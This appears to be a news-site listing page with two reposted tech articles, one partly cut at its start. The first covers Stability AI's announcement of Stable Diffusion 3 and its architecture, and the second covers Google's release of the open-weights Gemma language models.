Like Mostaque said, the Stable Diffusion 3 family uses diffusion transformer architecture, which is a new way of creating images with AI that swaps out the usual image-building blocks (such as U-Net architecture) for a system that works on small pieces of the picture. The method was inspired by transformers, which are good at handling patterns and sequences. This approach not only scales up efficiently but also reportedly produces higher-quality images.

Stable Diffusion 3 also utilizes “flow matching,” which is a technique for creating AI models that can generate images by learning how to transition from random noise to a structured image smoothly. It does this without needing to simulate every step of the process, instead focusing on the overall direction or flow that the image creation should follow.

A comparison of outputs between OpenAI's DALL-E 3 and Stable Diffusion 3 with the prompt,

Enlarge / A comparison of outputs between OpenAI’s DALL-E 3 and Stable Diffusion 3 with the prompt, “Night photo of a sports car with the text “SD3″ on the side, the car is on a race track at high speed, a huge road sign with the text ‘faster.'”

We do not have access to Stable Diffusion 3 (SD3), but from samples we found posted on Stability’s website and associated social media accounts, the generations appear roughly comparable to other state-of-the-art image-synthesis models at the moment, including the aforementioned DALL-E 3, Adobe Firefly, Imagine with Meta AI, Midjourney, and Google Imagen.

SD3 appears to handle text generation very well in the examples provided by others, which are potentially cherry-picked. Text generation was a particular weakness of earlier image-synthesis models, so an improvement to that capability in a free model is a big deal. Also, prompt fidelity (how closely it follows descriptions in prompts) seems to be similar to DALL-E 3, but we haven’t tested that ourselves yet.

While Stable Diffusion 3 isn’t widely available, Stability says that once testing is complete, its weights will be free to download and run locally. “This preview phase, as with previous models,” Stability writes, “is crucial for gathering insights to improve its performance and safety ahead of an open release.”

Stability has been experimenting with a variety of image-synthesis architectures recently. Aside from SDXL and SDXL Turbo, just last week, the company announced Stable Cascade, which uses a three-stage process for text-to-image synthesis.

Listing image by Emad Mostaque (Stability AI)

Stability announces Stable Diffusion 3, a next-gen AI image generator Read More »

google-goes-“open-ai”-with-gemma,-a-free,-open-weights-chatbot-family

Google goes “open AI” with Gemma, a free, open-weights chatbot family

Free hallucinations for all —

Gemma chatbots can run locally, and they reportedly outperform Meta’s Llama 2.

The Google Gemma logo

On Wednesday, Google announced a new family of AI language models called Gemma, which are free, open-weights models built on technology similar to the more powerful but closed Gemini models. Unlike Gemini, Gemma models can run locally on a desktop or laptop computer. It’s Google’s first significant open large language model (LLM) release since OpenAI’s ChatGPT started a frenzy for AI chatbots in 2022.

Gemma models come in two sizes: Gemma 2B (2 billion parameters) and Gemma 7B (7 billion parameters), each available in pre-trained and instruction-tuned variants. In AI, parameters are values in a neural network that determine AI model behavior, and weights are a subset of these parameters stored in a file.

Developed by Google DeepMind and other Google AI teams, Gemma pulls from techniques learned during the development of Gemini, which is the family name for Google’s most capable (public-facing) commercial LLMs, including the ones that power its Gemini AI assistant. Google says the name comes from the Latin gemma, which means “precious stone.”

While Gemma is Google’s first major open LLM since the launch of ChatGPT (it has released smaller research models such as FLAN-T5 in the past), it’s not Google’s first contribution to open AI research. The company cites the development of the Transformer architecture, as well as releases like TensorFlow, BERT, T5, and JAX as key contributions, and it would not be controversial to say that those have been important to the field.

A chart of Gemma performance provided by Google. Google says that Gemma outperforms Meta's Llama 2 on several benchmarks.

Enlarge / A chart of Gemma performance provided by Google. Google says that Gemma outperforms Meta’s Llama 2 on several benchmarks.

Owing to lesser capability and high confabulation rates, smaller open-weights LLMs have been more like tech demos until recently, as some larger ones have begun to match GPT-3.5 performance levels. Still, experts see source-available and open-weights AI models as essential steps in ensuring transparency and privacy in chatbots. Google Gemma is not “open source” however, since that term usually refers to a specific type of software license with few restrictions attached.

In reality, Gemma feels like a conspicuous play to match Meta, which has made a big deal out of releasing open-weights models (such as LLaMA and Llama 2) since February of last year. That technique stands in opposition to AI models like OpenAI’s GPT-4 Turbo, which is only available through the ChatGPT application and a cloud API and cannot be run locally. A Reuters report on Gemma focuses on the Meta angle and surmises that Google hopes to attract more developers to its Vertex AI cloud platform.

We have not used Gemma yet; however, Google claims the 7B model outperforms Meta’s Llama 2 7B and 13B models on several benchmarks for math, Python code generation, general knowledge, and commonsense reasoning tasks. It’s available today through Kaggle, a machine-learning community platform, and Hugging Face.

In other news, Google paired the Gemma release with a “Responsible Generative AI Toolkit,” which Google hopes will offer guidance and tools for developing what the company calls “safe and responsible” AI applications.

Google goes “open AI” with Gemma, a free, open-weights chatbot family Read More »